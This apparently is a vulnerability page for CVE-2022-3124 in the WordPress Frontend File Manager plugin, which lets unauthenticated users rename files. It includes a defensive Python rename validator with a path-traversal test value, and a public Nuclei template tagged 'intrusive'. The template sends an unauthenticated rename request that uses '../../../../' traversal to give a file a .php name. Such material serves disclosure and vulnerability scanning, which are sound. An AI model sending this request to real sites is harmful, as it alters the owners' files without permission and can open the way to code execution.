The Frontend File Manager Plugin WordPress plugin before 21.3 allows any unauthenticated user to rename files uploaded by users. Furthermore, due to the lack of validation of the destination filename, this could allow them to change the content of arbitrary files on the web server.
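The two checks whose absence is described above (authorization of the caller and validation of the destination filename), as an added example that is not the plugin's own code or its 21.3 fix. The function names, the extension allow-list and the upload path are assumptions made for illustration.

```python
import os
import re

# Assumed allow-list and naming policy; tune to what the site actually accepts.
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif", ".pdf", ".txt"}
# One bare name, exactly one dot, no separators, NUL bytes or leading dot.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9 _-]{0,99}\.[A-Za-z0-9]{1,5}")


class RenameRejected(ValueError):
    """Raised when a rename request must be refused."""


def resolve_rename_target(upload_dir, current_name, requested_name, caller_owns_file):
    """Return the absolute destination path for a rename or raise RenameRejected."""
    # CWE-862: only the authenticated owner of the file may rename it.
    if not caller_owns_file:
        raise RenameRejected("caller is not the authenticated owner")
    # Rejects "../" and "..\" sequences, absolute paths and double extensions.
    if not SAFE_NAME.fullmatch(requested_name):
        raise RenameRejected("destination is not a bare file name")
    # A rename must not change the file type, e.g. .pdf to .php.
    old_ext = os.path.splitext(current_name)[1].lower()
    new_ext = os.path.splitext(requested_name)[1].lower()
    if new_ext != old_ext or new_ext not in ALLOWED_EXTENSIONS:
        raise RenameRejected("extension changed or not allowed")
    # Defence in depth: the resolved path must stay inside the upload directory.
    base = os.path.realpath(upload_dir)
    target = os.path.realpath(os.path.join(base, requested_name))
    if os.path.commonpath([base, target]) != base:
        raise RenameRejected("destination escapes the upload directory")
    return target


def rejection_reason(upload_dir, current_name, requested_name, caller_owns_file):
    """Return None if the rename is acceptable, otherwise the refusal message."""
    try:
        resolve_rename_target(upload_dir, current_name, requested_name, caller_owns_file)
    except RenameRejected as exc:
        return str(exc)
    return None


if __name__ == "__main__":
    uploads = "/srv/www/wp-content/uploads/user_7"  # constructed path and requests
    for new, owner in [("report-final.pdf", True), ("../../../../abcdef.php", True),
                       ("report.php", True), ("report-final.pdf", False)]:
        print(repr(new), owner, "->", rejection_reason(uploads, "report.pdf", new, owner) or "ok")
```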
PoC code [public]
id: CVE-2022-3124

info:
  name: Frontend File Manager < 21.3 - Unauthenticated File Renaming
  author: riteshs4hu
  severity: medium
  description: |
    The Frontend File Manager Plugin WordPress plugin before 21.3 allows any unauthenticated user to rename files uploaded by users. Furthermore, due to the lack of validation of the destination filename, this could allow them to change the content of arbitrary files on the web server.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-3124
    - https://wpscan.com/vulnerability/00f76765-95af-4dbc-8c37-f1b15a0e8608/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-3124
    cwe-id: CWE-862
    epss-score: 0.39662
    epss-percentile: 0.97222
    cpe: cpe:2.3:a:najeebmedia:frontend_file_manager:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: najeebmedia
    product: frontend_file_manager
    framework: wordpress
    publicwww-query: "/wp-content/plugins/nmedia-user-file-uploader/"
  tags: cve,cve2022,wordpress,wp-plugin,wpscan,nmedia-user-file-uploader,file-upload,intrusive

variables:
  rand_string: '{{to_lower(rand_text_alpha(6))}}'

http:
  - raw:
      - |
        POST /wp-json/wpfm/v1/file-rename HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        fileid=1&filename=../../../../{{rand_string}}.php

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - '"fileid"\s*:\s*"([^"]+)"'
          - '"filename"\s*:\s*"([^"]+)"'
        condition: and

      - type: word
        part: content_type
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 4a0a0047304502204c759394487dece1413323e0cfa82ae0939815ddf4754d6dfedfc178207ae2f5022100e71be6852d74749d4b84f1afedfbe1bb37ca7af62d82e4ccaa5c953c9bfbbf1d:922c64590222798bb761d5b6d8e72950